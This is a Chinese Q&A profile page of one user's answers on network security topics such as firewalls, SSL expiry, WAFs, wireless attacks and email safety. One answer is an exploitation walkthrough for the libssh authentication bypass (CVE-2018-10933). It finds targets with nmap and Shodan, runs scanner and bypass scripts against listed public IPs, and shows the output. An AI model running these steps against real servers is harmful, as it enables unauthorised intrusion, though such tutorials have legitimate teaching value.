<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    齊士忠 的所有回復(718)

    評論于 1年前,獲得 0 個贊

    目前,大多數防火墻主要實現的功能有:

    • 包過濾

      包過濾是防火墻所要實現的最基本功能,它可將不符合要求的包過濾掉。包過濾技術已經由原來的靜態包過濾發展到了動態包過濾,靜態包過濾只是在網絡層上對包的地址、端口等信息進行判定控制,而動態包過濾是在所有通信層上對包的狀態進行檢測分析,判斷包是否符合安全要求。動態包過濾技術支持多種協議和應用程序,易擴展、易實現。

    • 審計和報警機制

      審計是一種重要的安全措施,用以監控通信行為和完善安全策略,檢查安全漏洞和錯誤配置,并對入侵者起到一定的威懾作用。報警機制是在通信違反相關策略以后,以多種方式如聲音、郵件、電話、手機短信息及時報告給管理人員。防火墻的審計和報警機制在防火墻體系中是很重要的,只有有了審計和報警,管理人員才可能知道網絡是否受到了攻擊。

    • 遠程管理

      遠程管理是防火墻管理功能的擴展之一,也是非常實用的功能,防火墻是否具有這種遠程管理功能已成為選擇防火墻產品的重要參考指標之一。使用防火墻的遠程管理功能可以在辦公室直接管理托管在網絡運營部門的防火墻,甚至坐在家中就可以重新調整防火墻的安全規則和策略。

    • NAT

      絕大多數防火墻都具有網絡地址轉換(NAT)功能。目前防火墻一般采用雙向 NAT,即 SNAT 和 DNAT。SNAT 用于對內部網絡地址進行轉換,對外部網絡隱藏內部網絡的結構,使得對內部的攻擊更加困難;并可以節省 IP 資源,有利于降低成本。DNAT 主要用于實現外網主機對內網和 DMZ 區主機的訪問。

    • 代理

      目前代理主要有如下兩種實現方式。分別是透明代理(Transparent proxy)和傳統代理。

    • MAC 地址與 IP 地址的綁定

      把 MAC 地址與 IP 地址綁定在一起,主要用于防止那些受到控制(不允許訪問外網)的內部用戶通過更換 IP 地址來訪問外網。

    • 流量控制(帶寬管理)和統計分析、流量計費

      流量控制可以分為基于 IP 地址的控制和基于用戶的控制。基于 IP 地址的控制是對通過防火墻各個網絡接口的流量進行控制,基于用戶的控制是通過用戶登錄來控制每個用戶的流量,從而防止某些應用或用戶占用過多的資源。并且通過流量控制可以保證重要用戶和重要接口的連接。

      統計分析是建立在流量控制基礎之上的。一般防火墻通過對基于 IP、服務、時間、協議等進行統計,并與管理界面實現掛接,實時或者以統計報表的形式輸出結果。流量計費因此也是非常容易實現的。

    • VPN

      在以往的網絡安全產品中,VPN 是一個單獨產品,現在大多數廠商把 VPN 與防火墻捆綁在一起,進一步增強和擴展了防火墻的功能,這也是一種產品整合的趨勢。

    評論于 1年前,獲得 0 個贊

    會產生危險,當ssl證書過期后會產生以下危險:

    • 覽器安全警告:當用戶訪問有過期SSL證書的網頁時,瀏覽器會發出錯誤消息并強制確認是否要訪問該網站。它警告SSL證書無效并且不鼓勵用戶訪問該網站。

    • 信任度降低:當SSL證書過期時,證書為用戶驗證的所有內容都不再有效。用戶無法判斷擁有該域名的組織是否是真正的所有者,無法確定網站是否安全加密,因此,用戶的信任度降低。

    • 容易被網絡釣魚:當證書過期后,網站會從HTTPS協議降低到HTTP協議,當安全等級降低后容易被釣魚網站模仿,這樣會導致網站的用戶被釣魚。

    • 公司聲譽受損:當用戶遇到具有過期SSL證書的網站時,公司的聲譽和可信度可能會受到損害。由于客戶不再信任該網站進行在線購買,他們也可能想知道他們的個人或財務信息是否有被曝光的風險。

    • 數據傳輸存在泄露風險:網站SSL證書過期意味著你的網站已經沒有SSL證書的保護,網站數據在網絡傳輸的過程中相當于“裸奔”,冒著隨時有可能被不法分子盜取網站數據和泄露用戶信息的風險。

    • 網站的訪問度降低:SSL證書過期對于用戶來說最直觀的影響莫過于瀏覽器會提示“不安全”,一旦出現這種情況,那用戶多半會選擇聽從瀏覽器的指引,關閉網站,甚至以后都不會再打開你的網站,造成用戶流失。

    SSL證書過期后的解決方法:

    1. SSL證書過期之后,網站是無法再繼續使用,需要在你的證書到期前辦理續費。當續費完成后,服務商證書服務系統將續期完成,并將復制證書訂單的信息到續費訂單中,同時自動將續費證書訂單提交審核。

    2. 當審核通過之后,就會獲得一張新的SSL數字證書,需要在你的服務器上安裝新的SSL數字證書,來替換即將過期的證書,或者你也可以聯系服務商網站的客服,他們會詳細解答證書過期的處理方法。

    3. 在解決SSL證書過期怎么辦過程中,如果出現了SSL證書無法完成續費這個情況,第一時間不要著急,我們可以重新申請購買一張,并準備好之前審核所需的材料。

    4. SSL證書過期解決了之后,會自動激活瀏覽器顯示“鎖”型安全標志,地址欄“https”開頭的頁面,這意味著在客戶端和web服務器之間,已建立起一條SSL安全加密通道,用戶在線輸入的機密信息在網絡傳輸過程中將不會被查看、竊取和修改。當然,SSL加密強度取決于,客戶瀏覽器的使用情況。

    評論于 1年前,獲得 0 個贊

    數據加密有數據加密使組織的數據無法讓沒有密鑰的人員破解,從而保護了數據的隱私,其加密的數據看起來像一長串隨機字符。數據加密的優點有:

    • 改善數據安全性

      將數據從一個地方遷移到另一個地方時,將處于較高的風險中。那就是最需要加密的時候。加密既可以在傳輸層面工作,也可以在靜態層面上工作,從而降低了受到中間人攻擊的風險。

    • 保密性

      保密性是數據加密用于鎖定人員的安全性,隱私和敏感信息的主要原因。與此同時,它提供了隱私保護,并降低了欺詐的機會。

    • 可靠性

      數據加密可以保護數據資源,使其免受網絡攻擊者的侵害。盡管加密的數據不能完全抵御網絡欺詐和攻擊,但數據所有者可以隨時識別其數據中是否存在惡意事件,這為他們采取主要行動提供了更好的機會。

    • 合規性

      加密是存儲和移動數據的最安全技術之一,因為它符合對組織強制的法規要求和限制,例如遵循FIPS、FISMA、HIPAA或PCI/DSS等法規。

    • 完整性

      使用數據加密技術可以有效阻止黑客對數據信息進行更改,能夠最大限度的保證數據不會給篡改。

    • 保護用戶隱私

      數據加密技術可以對敏感信息進行保護,如個人信息,使用數據加密技術對信息進行加密處理,可以更好的對信息進保護。

    評論于 11個月前,獲得 0 個贊

    桌面云管理平臺的關鍵技術有以下這些:

    • 遠程桌面發布服務技術:具備遠程桌面發布服務是桌面云的核心特征,遠程桌面發布服務是遠程桌面協議在服務端的具體實現。遠程桌面的發布一般有三種形式,一種是以多用戶操作系統為基礎,基于會話發布桌面,它具有低成本、易管理的特點;一種是以個人VDI模式發布桌面,它具有高度個性化、高性能及優秀的應用程序兼容性;一種是虛擬桌面池,它是虛擬化桌面架構的一個細分模式,在犧牲個性化的前提下降低成本,提高可管理性。

    • 資源的管控技術:資源池是云桌面生成、運行的基礎,因此對它的管控是基本的要求。資源的管控包括三部分:管理、分配、調度。資源的管理包括資源的發現、納入管理、獲取配置、失效后的刪除等。資源的分配需要滿足按需分配,即按照用戶要求的資源規格從資源池中分配虛擬資源,構成要求的虛擬機。資源的調度是指可以設定一定的調度策略,如資源利用優化策略、負載均衡策略等,自動化地調配虛擬機到滿足策略的主機上運行。

    • 桌面的管理技術:桌面是交付給用戶的最終產品,因此對桌面的管理是云平臺的關鍵技術。桌面的全生命周期,從創建、使用、調整到最后的銷毀,全都納入云平臺管理功能的桌面管理中。同時,還涉及用戶的管理:支持用戶屬于不同的部門、不同的組織,用戶會以不同的方式登錄桌面,以不同的方式使用桌面,甚至需要結合應用商城,向桌面推送指定的軟件,并支持禁止桌面使用的黑名單軟件。

    • 統一運維技術:桌面云系統管理的模塊眾多,如果每個模塊都有各自專屬的運維界面,管理員在管理時需要在眾多模塊界面中切換,記憶要求高、效率低下。若將所有運維界面集成到一個統一的平臺中,實現輕松切換,高效率地查看各模塊的運行狀態,獲取使用情況,有故障可以通過告警、日志快速定位,及時排查解決。

    • 數據分析技術:桌面云管理平臺管理眾多的資源,這些資源會產生大量的數據,如主機物理資源的使用率、存儲空間的使用率、虛擬機讀寫的IOPS、網絡帶寬等,以及用戶的登錄數據、用戶的使用頻率、資源的使用效率等。從這些數據中挖掘有用的信息,可以作為制作資源優化、資源擴容決策的依據。

    評論于 8個月前,獲得 0 個贊

    全面泛化的數字化身份管理技術有以下這些:

    • 身份管理技術:身份管理提供對訪問主體全面身份化的能力,用戶、設備、應用、服務等自然實體都必須在可信的身份平臺中注冊并形成數字化身份。并可對這些身份按照角色、組織、辦公場所等屬性進行多維度分類,為各類身份創建或關聯適宜的身份生命周期管理流程,實現身份歸一化管理。

    • 權限管理技術:權限管理可支撐訪問控制的相互協作,共同完成訪問主體到應用與數據的安全訪問。權限管理提供訪問主體權限信息(用戶、屬性、權限、應用)、策略配置管理功能及提供自服務和工作流邏輯;維護授權相關的規則、策略、屬性信息;提供外部授權信息接口和協議適配能力。

    • 賬號管理技術:集中的賬號管理包含對所有終端設備、服務器、網絡設備、應用等用戶賬號的集中管理。集中賬號管理可以將賬號與數字身份、自然人、設備和應用相關聯。

    • 資源管理技術:資源類型包括應用、接口、功能、數據等,可對所有的資源進行統一注冊和納管,通過資源標簽對資源的屬性進行多維度管理。賬號和資源的集中管理是集中授權、認證和審計的基礎。

    • 身份生命周期管理技術:針對不同的身份類型構建不同的身份生命周期管理模型,對身份創建、變更、凍結、刪除等全生命周期狀態進行管理,確保身份狀態與其對應的自然實體保持一致。

    • 訪問申請技術:用戶可以通過便捷的操作界面對所需的訪問權限進行申請,避免因管理員逐一分配權限產生的繁瑣管理成本。訪問申請一般與訪問審批配合使用。

    • 訪問審批技術:用戶對訪問權限進行申請后,系統及相關責任人對申請進行審批。審批方式包括通過電子流程審批、短信審批等方式;審批成功后,通過短信或郵件提醒申請人申請成功或者失敗。

    • 權限評估技術:支持對自助申請和既定權限進行風險和違規評估,為審批者和管理員提供相應風險情況的提示信息。權限評估基于用戶身份模型、任務及屬性情況來綜合評定。

    評論于 5個月前,獲得 0 個贊

    端口漏洞掃描工具有以下這些:

    • ipscan:ip端口掃描工具的英文名字是ipscan,是一款搜索局域網機器的綠色小軟件。IPScan在靜態IP地址環境下或者DHCP環境下,都提供完善的IP地址管理。用戶也可以使用IPScanProbe自帶的DHCP服務器,它能提供更高的安全和靈活的DHCP環境。IPScan也可以搜集和存儲網絡中所有設備不斷形成的,可審計的歷史記錄。這些歷史記錄可以提供一套高價值,并且不斷保持更新的網絡狀況文檔。

    • SupersCan:SupersCan是一款可以在Windows操作系統上任意運行環境上使用的端口掃描器。

    • SZ Port Scan:SZ Port Scan掃描計算機網絡打開的端口,它將生成一個列表顯示在指定的 IP 范圍,隨著對哪些端口和服務可用于每個 (MAC 地址,HTTP,SMB,FTP、 iSCSI、 SMTP 和 SNMP 服務) 的詳細信息中找到的所有設備,您可以輕松地過濾列表中通過端口號、計算機名稱或服務和還將結果保存到 XML 文件。

    • 亞普端口掃描器:這款端口掃描器能夠掃描局域網內最多255臺電腦的網絡端口,軟件已經內置常用的網絡端口地址列表,你也可以自己添加需要掃描的端口地址。

    • 艾蘭主機端口掃描器:艾蘭主機端口掃描器一款簡單的主機端口掃描器,操作界面簡單易于操作,所以操作界面也很簡單易于操作,導入ip地址就可以開始掃描遠程主機端口的狀態。

    評論于 2周前,獲得 0 個贊

    分別從法律要求、行業要求、安全要求三個層面說明為什么要做等保:

    • 法令規定,《網絡安全法》經營、應用信息系統的單位必須按照網絡安全等級保護體系的規定實行安全可靠責任,假如杜絕實行,將遭受相應的處罰。第21條:國家實行網絡安全等級保護體系。網絡運營商應根據網絡安全級別維護系統的規定,實行下列安全可靠責任,維護網絡免受影響、毀壞或沒經授權訪問,防范數據泄露、竊取、篡改。

    • 行業規定金融、電力、光電、醫療、教育等行業,主管機關明確規定從事單位的信息系統(APP)實施等級保護工作。

    • 企業系統安全需求信息系統運行、應用單位根據實行等級保護任務,可以發現系統內部的安全風險和缺點,根據安全可靠修改,可以提高系統的安全可靠維護能力,降低攻擊風險。

    評論于 6個月前,獲得 0 個贊

    OpenFlow協議中可能涉及的安全問題包括:

    • 控制器與交換機之間缺少數據加密措施:由于OpenFlow 1.3版本以后將TLS設置為可選機制,再加上TLS機制配置復雜和協議本身的脆弱性,使控制器與交換機之間缺乏合適的加密機制。因此,攻擊者可以利用這一特性,在控制器與交換機通信不加密數據時,竊聽甚至偽造南向通信數據,違反信息機密性、完整性等原則。

    • 控制器與交換機通信缺乏認證機制:TLS是一種雙向認證技術,交換機端和控制器端均需要產生證書,結合數字簽名及公、私鑰機制,進行雙向確認。這種協議開銷較大,不利于實際部署,因此,很多運維者在交換機上跳過TLS的部署,增加了安全隱患。在南向通信層,缺少認證機制會導致中間人攻擊和偽造攻擊,攻擊者可以很容易地監聽數據流。如果交換機未經認證與控制器通信,容易造成網絡狀態被篡改等安全問題。

    評論于 1年前,獲得 0 個贊

    針對無線網絡的攻擊分為:

    • 對無線接口的攻擊:這個一般指對調制解調協議或者常見的無線通信協議進行攻擊,利用無線通信協議的漏洞和缺陷來實施攻擊。

    • 對無線設備的攻擊:對無線設備的攻擊是對無線攻擊中最有效的工具方法,一般利用網絡竊聽、重放攻擊、克隆、欺騙攻擊等手段對無線設備、使用無線網絡的設備實施攻擊,該攻擊對無線網絡傷害極大。

    • 對無線網絡的攻擊:通過干擾無線網絡的傳輸實現攻擊,對網絡傳輸過程中實施干擾、截斷等操作,讓無線網絡的傳輸收到影響來造成攻擊。

    對無線網絡的攻擊最有效的是對無線網絡設備的攻擊具體方法如下:

    • 網絡竊聽:是指利用網絡通信技術缺陷,使得攻擊者能夠獲取到其他人的網絡通信信息。常見的網絡竊聽技術手段主要有網絡嗅探、中間人攻擊。

    • 重放攻擊:也被叫做是重播攻擊、回放攻擊或者是新鮮性攻擊,具體是指攻擊者發送一個目的主機已經接收過的包來達到欺騙系統的目的。重放攻擊主要是在身份認證的過程時使用,它可以把認證的正確性破壞掉。

    • 克隆:克隆網絡中的AP使得用戶每天所連接的那個看似安全的無線AP,就是被克隆偽裝的惡意AP。

    • 欺騙攻擊:欺騙攻擊就是利用假冒、偽裝后的身份與其他主機進行合法的通信或者發送假的報文,使受攻擊的主機出現錯誤,或者是偽造一系列假的網絡地址和網絡空間頂替真正的網絡主機為用戶提供網絡服務,以此方法獲得訪問用戶的合法信息后加以利用,轉而攻擊主機的網絡欺詐行為。常見的網絡欺騙攻擊主要方式有:IP欺騙、ARP欺騙、DNS欺騙、Weh欺騙、電子郵件欺騙、源路由欺騙等。

    評論于 7個月前,獲得 0 個贊

    WAF 或 Web Application Firewall 通過過濾和監控 Web 應用程序與 Internet 之間的 HTTP 流量來幫助保護 Web 應用程序。它通常可以保護 Web 應用程序,使其免受跨站點偽造、跨站點腳本 (XSS)、文件包含、SQL 注入及其他一些攻擊的影響。WAF 屬于協議第 7 層防御策略(OSI 模型),并不能抵御所有類型的攻擊。此攻擊緩解方法通常隸屬于一套工具,整套工具共同針對一系列攻擊手段建立整體防御措施。

    通過在 Web 應用程序前端部署 WAF,可在 Web 應用程序與 Internet 之間形成一道屏障。雖然代理服務器通過中介保護客戶機的身份,但 WAF 是一種反向代理,引導客戶端通過 WAF 到達服務器,從而防止暴露服務器。

    WAF 通過一組規則(通常稱為策略)運行。這些策略旨在過濾惡意流量,防止受到應用程序漏洞的侵害。WAF 的部分價值在于政策修改實施過程快速簡便,因而可以更迅速地響應不同的攻擊手段;DDoS 攻擊期間,可通過修改 WAF 策略快速實施 Rate Limiting。

    file 黑名單與白名單 WAF 之間有什么區別? 基于黑名單(消極安全模型)運行的 WAF 可防范已知攻擊。您可以將黑名單 WAF 想象為俱樂部保鏢按指示拒絕接待不符合著裝要求的客人。相反,基于白名單(積極安全模型)的 WAF 僅允許接受預先批準的流量。類似于奢華派對保鏢,只接待出席名單列出的客人。無論黑名單還是白名單,二者都有各自的優缺點,因此很多 WAF 提供混合安全模型,綜合實施兩種方法。

    什么是基于網絡、基于主機和基于云的 WAF? WAF 可以通過三種不同的方式來實施,每種方式都有各自的優缺點:

    基于網絡的 WAF 通常基于硬件。由于采用本地安裝模式,因而可以最大限度地縮短延遲,但基于網絡的 WAF 費用最昂貴,而且還要安裝和維護物理設備。 基于主機的 WAF 可完全集成至應用程序軟件。這種解決方案的成本低于基于網絡的 WAF,而且還能提供更多定制功能。基于主機的 WAF 的缺點在于,占用本地服務器資源,實施起來復雜,而且還會產生維護成本。這些組件通常需要預留維護時間,可能成本較高。 基于云的 WAF 是一種極易實施的經濟型方案;通常提供一站式安裝服務,就像更改 DNS 來重定向流量一樣簡單。另外,基于云的 WAF 的前期成本最低,因為用戶按月或按年支付安全即服務費用。基于云的 WAF 還可以提供持續更新解決方案以抵御最新威脅,用戶無需額外開展工作或投入成本。基于云的 WAF 的缺點在于,用戶將責任轉嫁給第三方,因此對他們而言,WAF 的某些功能可能成為黑盒。 內容來自:cloudflare

    評論于 6個月前,獲得 0 個贊

    電子郵件安全防范的措施如下:

    • 使用安全電子郵件:安全電子郵件通過使用數字證書對郵件進行數字簽名和加密,保證郵件的真實性和不被其他人偷閱。使用安全電子郵件需要先獲得數字標識。

    • 對電子郵件及其系統進行病毒防護:首先要選擇一款可靠的防毒軟件,借用防毒軟件中的郵件實時監視功能,在接收郵件過程中進行病毒掃描,有效防止郵件病毒的侵入。對于防毒軟件要注意定期升級更新,否則就很難對新病毒進行查殺.其次,了解一些郵件病毒具有的廣泛共性以便識別郵件病毒,當收到郵件時先看郵件大小,如果發現郵件中無內容,無附件,郵件自身又較大,則可能包含有病毒,如果附件的后綴名是雙后綴也極有可能是病毒,直接刪除即可。另外,由于一些客戶端程序一直以來都是黑客們照顧的重點,同時這些程序存在一些安全漏洞,因此要及時更新電子郵件客戶端程序,下載升級補丁。

    • 設置信箱過濾:電子郵箱的過濾器可使用戶按照郵件的來源,接收者,主題,長度來設置過濾規則。過濾器可設置在本地的電子郵件客戶端程度上, 也可直接通過瀏覽器在POP 3信箱的內部進行設置。在設置時,要注意”接收信件大小”選項,建議將這個數值控制在電子信箱容量的1/3左右,如果發過來信件大小超過了這一數值,就被認為是郵件炸彈,而直接被系統舍棄,通過郵箱過濾不僅可以防止垃圾郵件,還可以過濾掉一些帶病毒郵件,使其不進入收件箱中,減少病毒感染的機會。

    • 公共場所電子郵件安全防范:人們很多時候需要在諸如網吧,學校公共機房,單位等公共場所接收發送電子郵件,由于其它人都有機會接觸你收發電子郵件的機器,這樣電子郵件很容易被別人竊取,所以要特別注意公共場所電子郵件的安全。

    • 注意對郵箱進行加密:如果使用電子郵件客戶端程序收發電子郵件,注意對郵箱進行加密,否則別人可以直接查看你接收和發送出去的電子郵件,或者你在查閱郵件后直接把郵件徹底刪除,注意要從垃圾箱里面清除掉被刪除郵件,避免別人查閱到你的郵件.因為公共機房往往是在個局域網環境,使用客戶端程序接0R/發送電子郵件很容量被別人截獲數據包而獲得你的密碼, 因此最好是采用Web方式接收/發送電子郵件,并且在關閉計算機離開前,把瀏覽器緩存文件Cache刪除掉,否則,別人可以通過調用瀏覽器的緩存來查看你用Web瀏覽器瀏覽的信件內容。

    評論于 2年前,獲得 0 個贊

    步驟1:安裝工具和依賴項

    我們將用于掃描易受攻擊的設備的第一個程序稱為Nmap,可以輕松安裝。在Kali上,默認情況下應該可以使用它,但是如果不是,則可以使用以下命令快速下載它。

    apt install nmap
    為了檢測我們發現的設備是否容易受到攻擊,我們將使用Python程序libssh-scanner。它是用Python 2.7編寫的,因此,如果您僅安裝了Python 3,則必須確保也安裝Python 2.7。

    要安裝libssh-scanner,您需要克隆libssh-scanner存儲庫 5 通過在終端窗口中鍵入以下內容。

    git clone https://github.com/leapsecurity/libssh-scanner.git
    然后,在目錄內導航并列出其內容之后,您必須通過運行 以下所示的pip命令來安裝所需的庫 。

    cd libssh-scanner
    ls
    pip install -r requirements.txt

    接下來,還必須安裝該程序以執行攻擊。這次,您正在克隆“ libSSH-Authentication-Bypass”存儲庫 11 并使用以下命令安裝任何依賴項。

    git clone https://github.com/purplesec/libSSH-Authentication-Bypass.git
    cd libSSH-Authentication-Bypass
    pip install -r requirements.txt

    步驟2:使用NMAP掃描漏洞

    修復或利用易受攻擊的設備的第一步是找到它,并且在本地網絡上查找可能需要引起注意的設備相對容易。為此,我們將使用一個名為Nmap的程序來定位運行SSH服務器的設備,并確定libssh是否正在其上運行。Nmap是任何黑客工具包中必不可少的工具,它使一個人可以快速掃描并發現給定網絡或IP范圍內的所有主機和服務。

    在這種情況下,我們將掃描本地連接到我們網絡的設備,Nmap會告訴我們網絡上的每個設備是否正在使用易受攻擊的libssh版本。要遵循本指南,您將需要安裝Nmap,但是如果您使用Kali Linux,則可能已經安裝了Nmap。

    要使用libssh掃描并發現本地網絡上的所有設備,請打開一個終端窗口并輸入以下 nmap 命令。

    nmap -sV -p22 192.168.0.0/24
    分解命令, nmap 告訴計算機我們實際上要開始使用Nmap,而 -sV 告訴Nmap我們要執行服務掃描,該掃描將捕獲開放端口上使用的任何服務的標志。標志 -p22 告訴Nmap僅掃描端口22(這是SSH通信的標準端口)上的設備。雖然這可能找不到在其他端口上使用SSH的設備,但是它將大大減少搜索時間。

    最后,目標表示為子網范圍;前三個字節對于您的搜索將是唯一的。當掃描一臺計算機而不是一臺計算機時,最后的0/24對于搜索整個子網至關重要。如果需要查找子網范圍,可以使用“ ipcalc ”之類的工具 1個”,它將為您計算出來。為此,請通過鍵入ifconfig查找您的IP地址 ,然后鍵入 ipcalc yourIP (將“ yourIP”替換為您的IP地址)。

    w1456

    該命令將返回連接到該子網的設備的列表,以及從掃描端口收集的一些信息。在這種情況下,我們正在尋找使用早于0.7.6版本的libssh的任何目標。您可以期望看到如下所示的輸出。

    Nmap scan report for 172.16.42.1
    Host is up (0.0098s latency).
    
    PORT   STATE  SERVICE VERSION
    22/tcp closed ssh
    
    Nmap scan report for 172.16.42.32
    Host is up (0.21s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)
    
    Nmap scan report for 172.16.42.53
    Host is up (0.079s latency).
    
    PORT   STATE  SERVICE VERSION
    22/tcp closed ssh
    
    Nmap scan report for 172.16.42.67
    Host is up (0.024s latency).
    
    PORT   STATE    SERVICE VERSION
    22/tcp filtered ssh

    步驟3:發現LIBSSH漏洞服務器

    絕大多數易受攻擊的服務器將可以通過遠程網絡進行訪問,因此我們將需要以不同的方式進行搜索,以查找未直接連接到局域網的設備。

    要找到遠程目標,您將需要利用稱為Shodan的服務 5,這是一個搜索引擎,可以找到連接到網絡的任何設備-與Google不同,Google僅從端口80上的網絡服務器返回結果。例如,Shodan可以將您定向到功能正常的IP攝像機的登錄頁面,如果默認密碼未更改,則可能授予您訪問攝像機的權限。

    Shodan將為許多易受攻擊的SSH服務器建立索引,我們可以通過端口號和其他關鍵字搜索來查找這些服務器,這些服務器顯示運行0.7.6之前版本的libssh的主機,我們知道該主機已受到此漏洞的影響。

    首先,注冊一個免費帳戶,您可以使用該帳戶查看任何搜索查詢的前兩頁或大約20個唯一設備。然后,要查找易受libssh攻擊的服務器,您將在搜索中需要三個術語:

    port:22,這是SSH協議的默認端口。即使可以將SSH移至任何未使用的端口,這也不是很常見,因為它的真正作用是通過簡單掃描端口22來防止找到服務器。
    LibSSH,它返回使用libssh庫發布的所有服務器,表明它們可能被利用。
    0.7。*,將搜索結果限制為使用以“ 0.7”開頭的libssh版本的設備。并從結果中排除更多最新版本。雖然您可能仍會得到一些修補的結果,但是您將使用此過濾器消除大多數更新的設備。
    上面的搜索將返回可能容易受到此攻擊的IP地址的列表,以及Shodan能夠檢索到的更多信息。Shodan的信息可以包括橫幅標語,設備的位置,最新活動以及對服務器進行控制的組織。

    w1456%20(1)

    步驟4:在服務器上測試LIBSSH漏洞

    由于您已收集了容易受到該漏洞利用的目標列表(本地或遠程),因此可以使用“ libssh-scanner”掃描目標IP地址,并確定它們是否仍然很容易受到攻擊。其他工具甚至可以進一步嘗試建立外殼,但是請務必注意,未經許可使用SSH訪問另一臺設備可能會違反《計算機欺詐和濫用法》。取決于誰擁有您要訪問的設備,這可能使您陷入嚴重的法律麻煩。

    除了法律上的考慮外,您還應該警惕從您的真實IP地址連接到可能有意受到此漏洞利用的設備。蜜罐通常以這種方式設置,以吸引業余黑客,并且您可能會發現自己身處配置為陷阱的設備中。

    現在,使用libssh-scanner檢查步驟2和3中收集的目標是否實際上容易受到該漏洞利用。為此,請創建一個TXT文件,其中包含在步驟2和3中找到的所有IP地址,每個IP地址都用新行分隔。將此文本文件命名為“ ips.txt”,并將其放置在與步驟1中先前下載的libssh-scanner相同的文件夾中。

    進入目錄后,在終端窗口中輸入以下命令。

    python libsshscan.py --port 22 --aggressive ips.txt
    該命令將運行Python 2.7,掃描文本文件中的每個IP地址,并確定目標是否實際上容易受到CVE-2018-10933安全漏洞的攻擊。正如您在下面看到的那樣,執行掃描將Shodan的潛在目標列表縮小到一個,即159.180.132.163。

    python libsshscan.py --aggressive --port 22 ips.txt
    
    libssh scanner 1.0.4
    
    Searching for Vulnerable Hosts...
    
    * 52.151.63.100:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')
    * 13.57.20.28:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 132.206.51.74:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 18.221.40.109:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 52.1.165.128:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 54.86.221.162:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 52.173.202.21:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    * 54.193.60.245:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    ! 159.180.132.163:22 is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')
    * 34.194.133.107:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
    
    Scanner Completed Successfully

    要檢查一個結果,請使用libSSH-Authentication-Bypass測試攻擊。將目錄切換到您在步驟1中先前下載的libSSH-Authentication-Bypass文件夾中,然后輸入以下命令,用您要掃描的IP地址替換“ 159.180.132.163”。

    python3 libsshauthbypass.py --host 159.180.132.163
    該命令在已部分打補丁但仍然容易受到身份驗證繞過的服務器上返回以下輸出。

    python3 bypasswithfakekey.py --host 159.180.132.163
    DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30
    DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
    DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
    INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
    DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False
    DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
    DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
    DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
    DEBUG:paramiko.transport:Compression agreed: none
    /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
      algorithm=hashes.SHA1(),
    DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo <built-in function openssl_sha1>
    DEBUG:paramiko.transport:Switch to new keys ...
    /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/client.py:689: UserWarning: Unknown ssh-rsa host key for 159.180.132.163: b'7a7f8ca5b97cdd9356114ac650cc1353'
      key.get_fingerprint())))
    DEBUG:paramiko.transport:userauth is OK
    INFO:paramiko.transport:Authentication (password) failed.
    
    Auth Bypassed of the server you trying to bypass but  can't spawn the shell it's patched, truncated or using wrong vulnerable libSSH version. -blacknbunny
    評論于 1年前,獲得 0 個贊

    信息系統安全等級保護基本原則如下:

    最小特權原則

    最小特權原則是信息系統安全的最基本原則。最小特權原則的實質是任何實體僅擁有該主體需要完成其被指定任務所必需的特權,此外沒有更多的特權。最小特權可以盡量避免將信息系統資源暴露在侵襲之下,并減少因特別的侵襲造成的破壞。

    建立阻塞點原則

    阻塞點就是在網絡系統對外連接通道內,可以被系統管理人員進行監控的連接控制點。在那里系統管理人員可以對攻擊者進行監視和控制。

    縱深防御原則

    安全體系不應只依靠單一安全機制和多種安全服務的堆砌,而應該建立相互支撐的多種安全機制,建立具有協議層次和縱向結構層次的完備體系。通過多層機制互相支撐來獲取整個信息系統的安全。在網絡信息系統中常常需要建立防火墻,用于網絡內部與外部以及內部的子網之間的隔離,并滿足不同程度需求的訪問控制。但不能把防火墻作為解決網絡信息系統安全問題的唯一辦法,要知道攻擊者會使用各種手段來進行破壞,甚至有的手段是無法想象的。這就需要采用多種機制互相支持,例如,安全防御(建立防火墻)、主機安全(采用堡壘主機)以及加強保安教育和安全管理,只有這樣才能更好她抵御攻擊者的破壞。

    監測和消除最弱點連接原則

